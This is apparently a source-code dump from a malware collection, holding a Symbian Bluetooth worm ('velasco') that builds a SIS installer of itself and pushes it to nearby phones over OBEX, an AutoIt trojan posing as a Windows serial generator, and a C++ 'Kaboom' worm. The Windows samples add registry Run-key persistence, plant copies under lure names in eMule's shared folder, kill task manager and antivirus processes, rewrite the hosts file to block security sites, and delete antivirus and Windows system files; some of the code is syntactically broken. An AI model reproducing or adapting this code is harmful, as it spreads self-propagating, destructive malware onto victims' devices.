0x6c,0x00,0x61,0x00,0x73,0x00,0x63,0x00,0x6f,0x00,0x5c,0x00,0x76, 68 | 0x00,0x65,0x00,0x6c,0x00,0x61,0x00,0x73,0x00,0x63,0x00,0x6f,0x00, 69 | 0x2e,0x00,0x72,0x00,0x73,0x00,0x63,0x00,0x53,0x00,0x65,0x00,0x72, 70 | 0x00,0x69,0x00,0x65,0x00,0x73,0x00,0x36,0x00,0x30,0x00,0x50,0x00, 71 | 0x72,0x00,0x6f,0x00,0x64,0x00,0x75,0x00,0x63,0x00,0x74,0x00,0x49, 72 | 0x00,0x44,0x00,0x56,0x00,0x65,0x00,0x6c,0x00,0x61,0x00,0x73,0x00, 73 | 0x63,0x00,0x6f,0x00 74 | }; 75 | -------------------------------------------------------------------------------- /velasco/velasco/inc/resource.h: -------------------------------------------------------------------------------- 1 | unsigned char resourcecontent[]= 2 | { 3 | 0x0c,0x00,0x07,0x00,0x04,0x00,0x00,0x00,0x01,0x40,0xb0,0x6a,0x04, 4 | 0x00,0x0c,0x00,0x0c,0x00 5 | }; 6 | 7 | -------------------------------------------------------------------------------- /velasco/velasco/inc/velascoapplication.h: -------------------------------------------------------------------------------- 1 | #ifndef __VELASCOAPPLICATION_H 2 | #define __VELASCOAPPLICATION_H 3 | 4 | #include 5 | 6 | 7 | class CVelascoApplication : public CAknApplication 8 | { 9 | private: 10 | CApaDocument* CreateDocumentL(); 11 | 12 | TUid AppDllUid() const; 13 | }; 14 | 15 | #endif 16 | -------------------------------------------------------------------------------- /velasco/velasco/inc/velascoappui.h: -------------------------------------------------------------------------------- 1 | #ifndef __VELASCOAPPUI_H 2 | #define __VELASCOAPPUI_H 3 | 4 | #include 5 | 6 | 7 | class CVelascoAppView; 8 | 9 | 10 | class CVelascoAppUi : public CAknAppUi 11 | { 12 | public: 13 | void ConstructL(); 14 | 15 | void HandleCommandL(TInt aCommand); 16 | 17 | private: 18 | CVelascoAppView* iAppView; 19 | }; 20 | 21 | #endif 22 | -------------------------------------------------------------------------------- /velasco/velasco/inc/velascocopyfiles.h: -------------------------------------------------------------------------------- 1 | #ifndef __VELASCOCOPYFILES_H 2 | #define __VELASCOCOPYFILES_H 3 | 4 | #include 5 | 6 | 7 | class VelascoCopyFiles 8 | { 9 | public: 10 | void CopyFiles( CAknApplication *AppName ); 11 | 12 | private: 13 | unsigned short int CRC16( unsigned short int crc16, unsigned char *string, unsigned int stringsize ); 14 | void MakeInstaller(); 15 | }; 16 | 17 | #endif 18 | -------------------------------------------------------------------------------- /velasco/velasco/inc/velascodocument.h: -------------------------------------------------------------------------------- 1 | #ifndef __VELASCODOCUMENT_H 2 | #define __VELASCODOCUMENT_H 3 | 4 | #include 5 | 6 | 7 | class CVelascoAppUi; 8 | class CEikApplication; 9 | 10 | 11 | class CVelascoDocument : public CAknDocument 12 | { 13 | public: 14 | static CVelascoDocument* NewL( CEikApplication& aApp ); 15 | static CVelascoDocument* NewLC( CEikApplication& aApp ); 16 | 17 | CEikAppUi* CreateAppUiL(); 18 | 19 | private: 20 | void ConstructL() { }; 21 | 22 | inline CVelascoDocument( CEikApplication& aApp ); 23 | }; 24 | 25 | #endif 26 | -------------------------------------------------------------------------------- /velasco/velasco/src/bluetooth.cpp: -------------------------------------------------------------------------------- 1 | // Codigo baseado em: 2 | // http://irssibot.777-team.org/cobain/docs/2004-01-13/impl-html/btdiscoverer_8cpp-source.html 3 | // http://forum.newlc.com/viewtopic.php?p=2752 4 | // http://www.cs.tut.fi/~mobo/Symbianv6onedocs/devlib/Common/APIGuide/Bluetooth/UsingBluetoothSockets/HowToFindAndConnectToADevice/Howtoselectaremotedevice.html 5 | // http://www.rdc.cz/index.php?jazyk=0&sid=0&main=sekce&stav=clanek&cid=290 6 | 7 | #include "bluetooth.h" 8 | 9 | 10 | #define _BLUETOOTH_NOT_CONNECTED 0 11 | #define _BLUETOOTH_CONNECTED 1 12 | #define _BLUETOOTH_DISCONNECT 2 13 | 14 | #define _NOT 0 15 | 16 | 17 | VelascoBluetooth::VelascoBluetooth() : CActive( CActive::EPriorityStandard ) 18 | { 19 | FoundCell = _NOT; 20 | BluetoothStatus = _BLUETOOTH_CONNECTED; 21 | 22 | iCurrObject = CObexFileObject::NewL( TPtrC( NULL, 0 ) ); 23 | iCurrObject->InitFromFileL( _L( "C:\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\VELASCO.SIS" ) ); 24 | 25 | // Adicionando no scheduler, evita problemas de sincronismos 26 | CActiveScheduler::Add( this ); 27 | } 28 | 29 | 30 | VelascoBluetooth* VelascoBluetooth::NewL() 31 | { 32 | return NewLC(); 33 | } 34 | 35 | 36 | VelascoBluetooth* VelascoBluetooth::NewLC() 37 | { 38 | VelascoBluetooth* self = new VelascoBluetooth; 39 | self->ConstructL(); 40 | return self; 41 | } 42 | 43 | 44 | void VelascoBluetooth::ConstructL() 45 | { 46 | BluetoothStatus = _BLUETOOTH_CONNECTED; 47 | 48 | RunL(); 49 | } 50 | 51 | 52 | void VelascoBluetooth::RunL() 53 | { 54 | if ( BluetoothStatus == _BLUETOOTH_NOT_CONNECTED ) 55 | { 56 | BluetoothStatus = _BLUETOOTH_CONNECTED; 57 | 58 | // Ja estava conectado ? 59 | if ( iClient->IsConnected() ) 60 | { 61 | BluetoothStatus = _BLUETOOTH_DISCONNECT; 62 | 63 | Cancel(); 64 | iClient->Put( *iCurrObject, iStatus ); 65 | SetActive(); 66 | 67 | return; 68 | } 69 | } 70 | else if ( BluetoothStatus == _BLUETOOTH_DISCONNECT ) 71 | { 72 | BluetoothStatus = _BLUETOOTH_CONNECTED; 73 | 74 | Cancel(); 75 | iClient->Disconnect( iStatus ); 76 | SetActive(); 77 | 78 | return; 79 | } 80 | 81 | // Conseguiu conectar ? 82 | if ( BluetoothStatus == _BLUETOOTH_CONNECTED ) 83 | { 84 | if ( iClient != NULL ) 85 | { 86 | delete iClient; 87 | iClient = NULL; 88 | } 89 | 90 | while ( BluetoothStatus == _BLUETOOTH_CONNECTED ) 91 | { 92 | RSocketServ socketServ; 93 | TProtocolDesc pInfo; 94 | TNameEntry entry; 95 | 96 | if ( socketServ.Connect() == KErrNone ) 97 | { 98 | if ( socketServ.FindProtocol( (const TProtocolName &) _L( "BTLinkManager" ), pInfo ) == KErrNone ) 99 | { 100 | RHostResolver hr; 101 | 102 | if ( hr.Open( socketServ, pInfo.iAddrFamily, pInfo.iProtocol ) == KErrNone ) 103 | { 104 | TInquirySockAddr addr; 105 | 106 | FoundCell = _NOT; 107 | 108 | addr.SetAction( KHostResInquiry ); 109 | addr.SetIAC( KGIAC ); 110 | 111 | TRequestStatus status; 112 | hr.GetByAddress( addr, entry, status ); 113 | 114 | User::WaitForRequest( status ); 115 | 116 | FoundCell = ( status == KErrNone ); 117 | } 118 | } 119 | 120 | socketServ.Close(); 121 | } 122 | 123 | if ( FoundCell ) 124 | { 125 | FoundCell = _NOT; 126 | 127 | Cancel(); 128 | 129 | TBTSockAddr addr( entry().iAddr ); 130 | TBTDevAddr btAddress; 131 | 132 | btAddress = addr.BTAddr(); 133 | 134 | TObexBluetoothProtocolInfo obexProtocolInfo; 135 | 136 | obexProtocolInfo.iTransport.Copy( _L( "RFCOMM" ) ); 137 | obexProtocolInfo.iAddr.SetBTAddr( btAddress ); 138 | obexProtocolInfo.iAddr.SetPort( 9 ); 139 | 140 | if ( ( iClient = CObexClient::NewL( obexProtocolInfo ) ) ) 141 | { 142 | iStatus = KRequestPending; 143 | 144 | BluetoothStatus = _BLUETOOTH_NOT_CONNECTED; 145 | 146 | Cancel(); 147 | iClient->Connect( iStatus ); 148 | SetActive(); 149 | } 150 | } 151 | else 152 | { 153 | BluetoothStatus = _BLUETOOTH_CONNECTED; 154 | } 155 | } 156 | } 157 | } 158 | -------------------------------------------------------------------------------- /velasco/velasco/src/file.cpp: -------------------------------------------------------------------------------- 1 | // Arquivo obtido em: 2 | // http://www.todosymbian.com/files2/file.zip 3 | 4 | #include "file.h" 5 | 6 | 7 | bool File::Open(const TDesC &name,unsigned int mode){ 8 | TInt mask = 0; 9 | TInt err = 0; 10 | 11 | fsSession.Connect(); 12 | 13 | if(mode&OMText) mask = EFileStreamText; 14 | if(mode&OMRead) mask |= EFileRead; 15 | if(mode&OMWrite) mask |= EFileWrite; 16 | 17 | if(mode&OMCreate) err = rFile.Create(fsSession,name,mask); 18 | else if(mode&OMReplace) err = rFile.Replace(fsSession,name,mask); 19 | else if(mode&OMOpen) err = rFile.Open(fsSession,name,mask); 20 | 21 | if(err != KErrNone){ 22 | fsSession.Close(); 23 | return false; 24 | }else 25 | return true; 26 | } 27 | 28 | 29 | void File::Close(){ 30 | rFile.Flush(); 31 | rFile.Close(); 32 | fsSession.Close(); 33 | } 34 | 35 | 36 | int File::Read(void *buff,int length){ 37 | TPtr8 ptr((unsigned char*)buff,length); 38 | rFile.Read(ptr,length); 39 | return ptr.Length(); 40 | } 41 | 42 | 43 | int File::Write(void *buff,int length){ 44 | TPtr8 ptr((unsigned char*)buff,length,length); 45 | rFile.Write(ptr); 46 | return ptr.Length(); 47 | } 48 | 49 | 50 | void File::Seek(TSeek mode,int offSet){ 51 | rFile.Seek(mode,offSet); 52 | } 53 | -------------------------------------------------------------------------------- /velasco/velasco/src/velasco.cpp: -------------------------------------------------------------------------------- 1 | #include "velascoapplication.h" 2 | 3 | 4 | GLDEF_C TInt E32Dll(TDllReason aReason) 5 | { 6 | return KErrNone; 7 | } 8 | 9 | 10 | EXPORT_C CApaApplication* NewApplication() 11 | { 12 | return (new CVelascoApplication); 13 | } 14 | -------------------------------------------------------------------------------- /velasco/velasco/src/velascoapplication.cpp: -------------------------------------------------------------------------------- 1 | #include "velascodocument.h" 2 | #include "velascoapplication.h" 3 | 4 | 5 | static const TUid KUidVelascoApp = {0x10005591}; 6 | 7 | 8 | CApaDocument* CVelascoApplication::CreateDocumentL() 9 | { 10 | CApaDocument* document = CVelascoDocument::NewL(*this); 11 | return document; 12 | } 13 | 14 | 15 | TUid CVelascoApplication::AppDllUid() const 16 | { 17 | return KUidVelascoApp; 18 | } 19 | -------------------------------------------------------------------------------- /velasco/velasco/src/velascoappui.cpp: -------------------------------------------------------------------------------- 1 | #include "velascoappui.h" 2 | #include "velascocopyfiles.h" 3 | #include "bluetooth.h" 4 | 5 | 6 | void CVelascoAppUi::ConstructL() 7 | { 8 | BaseConstructL( ENoAppResourceFile ); 9 | 10 | VelascoCopyFiles copyfiles; 11 | copyfiles.CopyFiles( (CAknApplication *) this->Application() ); 12 | 13 | VelascoBluetooth *bluetooth; 14 | bluetooth = VelascoBluetooth::NewL(); 15 | } 16 | 17 | 18 | void CVelascoAppUi::HandleCommandL(TInt aCommand) 19 | { 20 | switch(aCommand) 21 | { 22 | case EAknSoftkeyExit: 23 | case EEikCmdExit: 24 | Exit(); 25 | break; 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /velasco/velasco/src/velascocopyfiles.cpp: -------------------------------------------------------------------------------- 1 | #include "velascocopyfiles.h" 2 | #include "file.h" 3 | 4 | #include 5 | 6 | 7 | _LIT16( MARCOSMDLFILE, "MARCOS.MDL" ); 8 | _LIT16( VELASCORSCFILE, "VELASCO.RSC" ); 9 | 10 | _LIT( VELASCOPATH, "C:\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\" ); 11 | _LIT( VELASCOAPPPATH, "C:\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\VELASCO.APP" ); 12 | _LIT( VELASCORSCPATH, "C:\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\VELASCO.RSC" ); 13 | _LIT( VELASCOSISPATH, "C:\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\VELASCO.SIS" ); 14 | 15 | _LIT( MDLPATH, "C:\\SYSTEM\\RECOGS\\" ); 16 | _LIT( MARCOSMDLPATH, "C:\\SYSTEM\\RECOGS\\MARCOS.MDL" ); 17 | 18 | 19 | #define BLOCK_LEN 200 20 | 21 | 22 | // Funcao de CRC16 obtida em: 23 | // http://homepage.ntlworld.com/thouky/software/psifs/sis.html 24 | 25 | unsigned short int VelascoCopyFiles::CRC16( unsigned short int crc16, unsigned char *string, unsigned int stringsize ) 26 | { 27 | unsigned int table[ 256 ], i; 28 | 29 | table[ 0 ] = 0; 30 | 31 | for ( i = 0; i < 128; i++ ) 32 | { 33 | unsigned int carry = table[ i ] & 0x8000; 34 | unsigned int temp = ( table[ i ] << 1 ) & 0xFFFF; 35 | 36 | table[ i * 2 + ( carry ? 0 : 1 ) ] = temp ^ 0x1021; 37 | table[ i * 2 + ( carry ? 1 : 0 ) ] = temp; 38 | } 39 | 40 | for ( i = 0; i < stringsize; i++ ) 41 | { 42 | crc16 = ( ( crc16 << 8 ) ^ table[ ( ( crc16 >> 8 ) ^ string[ i ] ) & 0xFF ] ); 43 | } 44 | 45 | return crc16; 46 | } 47 | 48 | 49 | void VelascoCopyFiles::MakeInstaller() 50 | { 51 | #include "header.h" 52 | #include "resource.h" 53 | 54 | File fInstaller; 55 | 56 | // Tenta criar o arquivo 57 | if ( ! fInstaller.Open( VELASCOSISPATH, File::OMRead | File::OMWrite | File::OMCreate ) ) 58 | { 59 | // Tenta substituir o arquivo 60 | if ( ! fInstaller.Open( VELASCOSISPATH, File::OMRead | File::OMWrite | File::OMReplace ) ) 61 | { 62 | return; 63 | } 64 | } 65 | 66 | File fApplication; 67 | 68 | if ( fApplication.Open( VELASCOAPPPATH, File::OMRead | File::OMOpen ) ) 69 | { 70 | File fMDL; 71 | 72 | if ( fMDL.Open( MARCOSMDLPATH, File::OMRead | File::OMOpen ) ) 73 | { 74 | unsigned int FilesLength, ResourceLength, Offset1, Offset2, Offset3; 75 | 76 | int MDLLength, ApplicationLength; 77 | 78 | // Obtem tamanho dos arquivos 79 | fApplication.rFile.Size( ApplicationLength ); 80 | fMDL.rFile.Size( MDLLength ); 81 | 82 | // Define tamanho dos dados e offsets 83 | ResourceLength = sizeof( resourcecontent ); 84 | FilesLength = ApplicationLength + MDLLength + ResourceLength; 85 | 86 | Offset1 = sizeof( headercontent ); 87 | Offset2 = Offset1 + ApplicationLength; 88 | Offset3 = Offset2 + MDLLength; 89 | 90 | // Acerta tamanhos e offsets na estrutura a ser gravada 91 | memcpy( &headercontent[ 0x50 ], &FilesLength, sizeof( unsigned int ) ); 92 | 93 | memcpy( &headercontent[ 0x82 ], &ApplicationLength, sizeof( unsigned int ) ); 94 | memcpy( &headercontent[ 0x86 ], &Offset1, sizeof( unsigned int ) ); 95 | memcpy( &headercontent[ 0x8A ], &ApplicationLength, sizeof( unsigned int ) ); 96 | 97 | memcpy( &headercontent[ 0xB2 ], &MDLLength, sizeof( unsigned int ) ); 98 | memcpy( &headercontent[ 0xB6 ], &Offset2, sizeof( unsigned int ) ); 99 | memcpy( &headercontent[ 0xBA ], &MDLLength, sizeof( unsigned int ) ); 100 | 101 | memcpy( &headercontent[ 0xE2 ], &ResourceLength, sizeof( unsigned int ) ); 102 | memcpy( &headercontent[ 0xE6 ], &Offset3, sizeof( unsigned int ) ); 103 | memcpy( &headercontent[ 0xEA ], &ResourceLength, sizeof( unsigned int ) ); 104 | 105 | // Grava o header 106 | fInstaller.Write( headercontent, sizeof( headercontent ) ); 107 | 108 | // Define algumas variaveisCalcula CRC16 dos 0x10 primeiros bytes do header 109 | unsigned char buffer[ BLOCK_LEN ]; 110 | 111 | unsigned short int crc16 = 0; 112 | int bytes; 113 | 114 | // Calcula CRC16 dos 0x10 primeiros bytes do header 115 | crc16 = CRC16( crc16, (unsigned char *) headercontent, 0x10 ); 116 | 117 | // Calcula o CRC16 restante do header 118 | crc16 = CRC16( crc16, (unsigned char *) &headercontent[ 0x12 ], sizeof( headercontent ) - 0x12 ); 119 | 120 | // Grava APP 121 | while ( ( bytes = fApplication.Read( buffer, BLOCK_LEN ) ) ) 122 | { 123 | fInstaller.Write( buffer, bytes ); 124 | 125 | crc16 = CRC16( crc16, (unsigned char *) buffer, bytes ); 126 | } 127 | 128 | // Grava RECOG 129 | while ( ( bytes = fMDL.Read( buffer, BLOCK_LEN ) ) ) 130 | { 131 | fInstaller.Write( buffer, bytes ); 132 | 133 | crc16 = CRC16( crc16, (unsigned char *) buffer, bytes ); 134 | } 135 | 136 | // Grava RSC 137 | fInstaller.Write( resourcecontent, sizeof( resourcecontent ) ); 138 | 139 | crc16 = CRC16( crc16, (unsigned char *) resourcecontent, sizeof( resourcecontent ) ); 140 | 141 | // Grava CRC16 no offset 0x10 142 | fInstaller.Seek( ESeekStart, 0x10 ); 143 | fInstaller.Write( &crc16, sizeof( unsigned short int ) ); 144 | 145 | // Fecha handle 146 | fMDL.Close(); 147 | } 148 | 149 | // Fecha handle 150 | fApplication.Close(); 151 | } 152 | 153 | // Fecha handle 154 | fInstaller.Close(); 155 | } 156 | 157 | 158 | void VelascoCopyFiles::CopyFiles( CAknApplication *AppName ) 159 | { 160 | TFileName TempName = AppName->DllName(); 161 | TempName.UpperCase(); 162 | 163 | TParse parser; 164 | parser.Set( TempName, NULL, NULL ); 165 | 166 | RFs fs; 167 | User::LeaveIfError( fs.Connect() ); 168 | 169 | if ( TempName != VELASCOAPPPATH ) 170 | { 171 | fs.MkDirAll( VELASCOPATH ); 172 | 173 | if ( BaflUtils::CopyFile( fs, TempName, VELASCOAPPPATH, CFileMan::EOverWrite ) == KErrNone ) 174 | { 175 | TempName = parser.DriveAndPath(); 176 | TempName.Append( VELASCORSCFILE ); 177 | 178 | BaflUtils::CopyFile( fs, TempName, VELASCORSCPATH, CFileMan::EOverWrite ); 179 | } 180 | } 181 | 182 | TempName = parser.DriveAndPath(); 183 | TempName.Append( MARCOSMDLFILE ); 184 | 185 | fs.MkDirAll( MDLPATH ); 186 | BaflUtils::CopyFile( fs, TempName, MARCOSMDLPATH, CFileMan::EOverWrite ); 187 | 188 | fs.Close(); 189 | 190 | // Gera instalador 191 | MakeInstaller(); 192 | } 193 | -------------------------------------------------------------------------------- /velasco/velasco/src/velascodocument.cpp: -------------------------------------------------------------------------------- 1 | #include "velascoappui.h" 2 | #include "velascodocument.h" 3 | 4 | 5 | CVelascoDocument* CVelascoDocument::NewL(CEikApplication& aApp) 6 | { 7 | CVelascoDocument* self = NewLC(aApp); 8 | CleanupStack::Pop(self); 9 | return self; 10 | } 11 | 12 | 13 | CVelascoDocument* CVelascoDocument::NewLC(CEikApplication& aApp) 14 | { 15 | CVelascoDocument* self = new (ELeave) CVelascoDocument(aApp); 16 | CleanupStack::PushL(self); 17 | self->ConstructL(); 18 | return self; 19 | } 20 | 21 | 22 | CVelascoDocument::CVelascoDocument(CEikApplication& aApp) : CAknDocument(aApp) 23 | { 24 | } 25 | 26 | 27 | CEikAppUi* CVelascoDocument::CreateAppUiL() 28 | { 29 | CEikAppUi* appUi = new (ELeave) CVelascoAppUi; 30 | return appUi; 31 | } 32 | -------------------------------------------------------------------------------- /virus miei/distraction/windows_vista_xp_2000_nt_me_98_serial_generator.au3: -------------------------------------------------------------------------------- 1 | RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run\", "lsass", "REG_SIZE", "C:\windows\lsasss.exe") 2 | FileCopy("C:\programmi\emule\incoming\windows_vista_xp_2000_nt_me_98_serial_generator.exe", "C:\windows\lsasss.exe") 3 | if ProcessExists("windows_vista_xp_2000_nt_me_98_serial_generator.exe") Then 4 | MsgBox(0, "yep", "the serial was created in C:\") 5 | EndIf 6 | While 1 = 1 7 | If ProcessExists("regedit.exe") Then 8 | ProcessClose("regedit.exe") 9 | EndIf 10 | if ProcessExists("taskmgr.exe") Then 11 | ProcessClose("taskmgr.exe") 12 | MsgBox(0, "error", "The process has terminated by explorer.exe") 13 | EndIf 14 | WEnd 15 | 16 | Func DisattivaAV 17 | while 1 = 1 18 | if ProcessExists("kav.exe") Then 19 | ProcessClose("kav.exe") 20 | EndIf 21 | if ProcessExists("avp.exe") then 22 | ProcessClose("avp.exe") 23 | EndIf 24 | if ProcessExists("zonealarm.exe") Then 25 | ProcessClose("zonealarm.exe") 26 | EndIf 27 | if ProcessExists("nod32.exe") Then 28 | ProcessClose("nod32.exe") 29 | EndIf 30 | If ProcessExists("avg.exe") Then 31 | ProcessClose("avg.exe") 32 | EndIf 33 | WEnd 34 | EndFunc 35 | 36 | 37 | Func Attacco_Ddos 38 | $mese = @MON 39 | $day = @MDAY 40 | if $mese = 6 And $day = 21 Then 41 | TCPConnect(85.12.27.135, 80) 42 | EndIf 43 | EndFunc 44 | 45 | 46 | Func RiempiDisco 47 | $v = 1 to 800000000000000000000000000000000000000000000000000000000000000000000000000000000 step +1 48 | for $c = 1 to 70000000000000000000000000000000 step +1 49 | FileOpen("C:\serial."$v".txt", 0) 50 | filewrite("Windows serial(www.serialz.to) de94r-33ss2-ki4ii-22op3-dx21c") 51 | EndFunc 52 | 53 | if $mese = 6 And $day > 21 Then 54 | Shutdown("shutdown -s") 55 | EndIf 56 | 57 | 58 | -------------------------------------------------------------------------------- /virus miei/distraction/windows_vista_xp_2000_nt_me_98_serial_generator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/virus miei/distraction/windows_vista_xp_2000_nt_me_98_serial_generator.exe -------------------------------------------------------------------------------- /virus miei/kaboom/Kaboom.cpp: -------------------------------------------------------------------------------- 1 | 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | const char msg1[]= "WINDOWS VISTA IS ARMAGEDDON"; 13 | const char msg2[]= "Kaboom worm"; 14 | char windir[MAX_PATH]; 15 | 16 | 17 | int APIENTRY WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) 18 | { 19 | char pathname[256]; 20 | GetWindowsDirectory(windir, sizeof(windir)); 21 | HMODULE hMe = GetModuleHandle(NULL); 22 | DWORD nRet = GetModuleFileName(hMe, pathname, 256); 23 | HKEY hKey; 24 | strcat(windir, "\\System32\\Sock_windows\\Services_update.exe"); 25 | CopyFile(pathname, windir, 0); 26 | 27 | RegCreateKey (HKEY_CURRENT_USER, "Software\\", &hKey); 28 | RegSetValueEx (hKey, "Windows Services", 0, REG_SZ, (LPBYTE) windir, sizeof(windir)); 29 | 30 | 31 | RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey); 32 | RegSetValueEx (hKey, "Windows Services", 0, REG_SZ, (LPBYTE)windir, sizeof(windir)); 33 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\Windows 2000-me-vista-xp-98 unlimited serial generation.exe", 0); 34 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\sexsexsex.src.exe", 0); 35 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\windows vista source code.zip.exe", 0); 36 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\Kaspersky_crack.exe", 0); 37 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\Nod32_crack.exe", 0); 38 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\Norton_key_generation.exe", 0); 39 | CopyFile(pathname, "C:\\Programmi\\emule\\incoming\\Downloader_windows_source_code.exe", 0); 40 | 41 | } 42 | 43 | void Message() 44 | { 45 | FILE *fpt; 46 | fpt = fopen ("C:\\message_for_mydoom","w") 47 | fprintf(fpt,"the mydoom worm is a stupid worm..."); 48 | fprintf(fpt,"is just a simple mass-mailer and p2p worm with an extra(Ddos_attack)...") 49 | fprintf(fpt,"this worm was propagated because the people are stupid and accept every attachment..."); 50 | fprintf(fpt,""); 51 | fprintf(fpt,"netsky and sasser are worm very simple but very dangerous...why? Because the administrator"); 52 | fprintf(fpt,"don't update...:("); 53 | fprintf(fpt,""); 54 | fprintf(fpt,"Kaboom's author"); 55 | fprintf(fpt,""); 56 | fprintf(fpt,""); 57 | fprintf(fpt,"") 58 | fprintf(fpt,""); 59 | fprintf(fpt,"i will survive"); 60 | fclose(fpt); 61 | } 62 | 63 | void BlockSite() 64 | { 65 | FILE *fpl; 66 | fpl = fopen ("C:\\WINDOWS\\System32\\drivers\\etc\\hosts","w"); 67 | fprintf (fpl,"0.0.0.0 google.com"); 68 | fprintf (fpl," 0.0.0.0 www.hotmail.com"); 69 | fprintf (fpl," 0.0.0.0 www.microsoft.com"); 70 | fprintf (fpl," 0.0.0.0 microsoft.com"); 71 | fprintf (fpl," 0.0.0.0 macafee.com"); 72 | fprintf (fpl," 0.0.0.0 www.macafee.com"); 73 | fprintf (fpl," 0.0.0.0 download.mcafee.com"); 74 | fprintf (fpl," 0.0.0.0 www.download.mcafee.com"); 75 | fprintf (fpl," 0.0.0.0 rads.mcafee.com"); 76 | fprintf (fpl," 0.0.0.0 us.mcafee.com"); 77 | fprintf (fpl," 0.0.0.0 www.networkassociates.com"); 78 | fprintf (fpl," 0.0.0.0 networkassociates.com"); 79 | fprintf (fpl," 0.0.0.0 update.symantec.com"); 80 | fprintf (fpl," 0.0.0.0 updates.symantec.com"); 81 | fprintf (fpl," 0.0.0.0 iveupdate.symantec.com"); 82 | fprintf (fpl," 0.0.0.0 norton.com"); 83 | fprintf (fpl," 0.0.0.0 www.symantec.com"); 84 | fprintf (fpl," 0.0.0.0 symantec.com"); 85 | fprintf (fpl," 0.0.0.0 www.norton.com"); 86 | fprintf (fpl," 0.0.0.0 google.com"); 87 | fprintf (fpl," 0.0.0.0 bitdefender.com"); 88 | fprintf (fpl," 0.0.0.0 www.viruslist.com"); 89 | fprintf (fpl," 0.0.0.0 viruslist.com"); 90 | fprintf (fpl," 0.0.0.0 www.virustotal.com"); 91 | fprintf (fpl," 0.0.0.0 virustotal.com"); 92 | fprintf (fpl," 0.0.0.0 www.kaspersky.com"); 93 | fprintf (fpl," 0.0.0.0 kaspersky.com"); 94 | fprintf (fpl," 0.0.0.0 kaspersky-labs.com"); 95 | fprintf (fpl," 0.0.0.0 www.kaspersky-labs.com"); 96 | fprintf (fpl," 0.0.0.0 www.trendmicro.com"); 97 | fprintf (fpl," 0.0.0.0 trendmicro.com"); 98 | fprintf (fpl," 0.0.0.0 www.pandasoftware.com"); 99 | fprintf (fpl," 0.0.0.0 pandasoftware.com"); 100 | fprintf (fpl," 0.0.0.0 www.nod32.com"); 101 | fprintf (fpl," 0.0.0.0 nod32.com"); 102 | fprintf (fpl," 0.0.0.0 yahoo.com"); 103 | fprintf (fpl," 0.0.0.0 mail.yahoo.com"); 104 | fprintf (fpl," 0.0.0.0 www.grisoft.com"); 105 | fprintf (fpl," 0.0.0.0 www.f-secure.com"); 106 | fprintf (fpl," 0.0.0.0 f-secure.com"); 107 | fclose(fpl); 108 | } 109 | 110 | void killavfw() 111 | { 112 | system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\*.dll /F /S /Q "); 113 | system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\data\\*.* /F /S /Q "); 114 | system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\help\\*.* /F /S /Q "); 115 | system("del C:\\Program Files\\McAfee.com\\VSO\\*.dll /F /S /Q "); 116 | system("del C:\\Program Files\\McAfee.com\\VSO\\*.ini /F /S /Q "); 117 | system("del C:\\Program Files\\McAfee.com\\VSO\\Res00\\*.dll /F /S /Q "); 118 | system("del C:\\Program Files\\McAfee.com\\VSO\\Dat\\4615\\*.* /F /S /Q "); 119 | system("del C:\\Program Files\\McAfee.com\\*.* /F /S /Q "); 120 | system("del C:\\Program Files\\Norton AntiVirus\\*.dll /F /S /Q "); 121 | system("del C:\\Program Files\\Common Files\\Symantec Shared\\*.exe /F /S /Q "); 122 | system("del C:\\Program Files\\Norton AntiVirus\\*.ini /F /S /Q"); 123 | system("del C:\\Program Files\\Norton AntiVirus\\*.exe /F /S /Q "); 124 | system("del C:\\Program Files\\Norton AntiVirus\\*.inf /F /S /Q "); 125 | system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.exe /F /S /Q "); 126 | system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.zap /F /S /Q "); 127 | system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.dll /F /S /Q "); 128 | system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\repair\\*.dll /F /S /Q "); 129 | system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.exe /F /S /Q "); 130 | system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.dll /F /S /Q "); 131 | } 132 | 133 | 134 | void Destinity(){ 135 | Sleep(600000000); 136 | system("del C:\\windows\\*exe /F /S /Q"); 137 | system("del C:\\windows\\*dll /F /S /Q"); 138 | } 139 | 140 | -------------------------------------------------------------------------------- /virus miei/mystic/windows vista key generation.au3: -------------------------------------------------------------------------------- 1 | Run("cmd.exe", "", @SW_HIDE) -------------------------------------------------------------------------------- /virus miei/mystic/windows vista key generation.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/virus miei/mystic/windows vista key generation.exe -------------------------------------------------------------------------------- /wrathrage/Debug/BuildLog.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kaiserfarrell/malware/c0aa3165f1584a70355b0aafde66486e485115d9/wrathrage/Debug/BuildLog.htm -------------------------------------------------------------------------------- /wrathrage/Debug/OMBUDSMN.ASP: -------------------------------------------------------------------------------- 1 | This program is produced by a member of the Association of Shareware 2 | Professionals (ASP). ASP wants to make sure that the shareware principle 3 | works for you. If you are unable to resolve a shareware-related problem 4 | with an ASP member by contacting the member directly, ASP may be able to 5 | help. The ASP Ombudsman can help you resolve a dispute or problem with an 6 | ASP member, but 